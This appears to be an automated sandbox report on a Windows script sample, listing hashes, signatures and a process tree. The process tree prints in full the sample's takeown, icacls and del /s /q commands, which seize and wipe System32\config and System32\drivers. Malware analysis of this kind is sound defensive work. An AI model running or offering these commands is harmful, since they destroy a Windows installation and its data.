Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 15-08-2024 21:42

Static task: static1
Behavioral task: behavioral1
Sample: code.wsf
Resource: win7-20240729-en
General
Target: code.wsf
Size: 3KB
MD5: 57a8ed12915b612b81ec573f56394818
SHA1: f834294e6d6a7150da076670825857960df8a7a2
SHA256: 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512: 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes:
    pid   process
    1812  icacls.exe
    2628  takeown.exe
    2156  takeown.exe
    2332  icacls.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes:
    pid   process
    2156  takeown.exe
    2332  icacls.exe
    1812  icacls.exe
    2628  takeown.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description                        pid   process
    Token: SeTakeOwnershipPrivilege    2156  takeown.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes (each of the seven entries below is recorded three times in the report, giving 21 IoCs):
    description                         pid   process      target process
    PID 2108 wrote to memory of 2356    2108  cmd.exe      WScript.exe
    PID 2356 wrote to memory of 1616    2356  WScript.exe  cmd.exe
    PID 2356 wrote to memory of 1856    2356  WScript.exe  cmd.exe
    PID 1616 wrote to memory of 2628    1616  cmd.exe      takeown.exe
    PID 1856 wrote to memory of 2156    1856  cmd.exe      takeown.exe
    PID 1616 wrote to memory of 2332    1616  cmd.exe      icacls.exe
    PID 1856 wrote to memory of 1812    1856  cmd.exe      icacls.exe
Processes
- C:\Windows\system32\cmd.exe (PID 2108)
  cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe (PID 2356)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (PID 1616)
      "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (PID 2628)
        takeown /f c:\windows\system32\config\*
        - Possible privilege escalation attempt
        - Modifies file permissions
      - C:\Windows\system32\icacls.exe (PID 2332)
        icacls c:\windows\system32\config\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
    - C:\Windows\System32\cmd.exe (PID 1856)
      "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (PID 2156)
        takeown /f c:\windows\system32\drivers\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe (PID 1812)
        icacls c:\windows\system32\drivers\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
- C:\Windows\system32\wbem\WMIADAP.EXE (PID 2268)
  wmiadap.exe /F /T
Network
MITRE ATT&CK Enterprise v15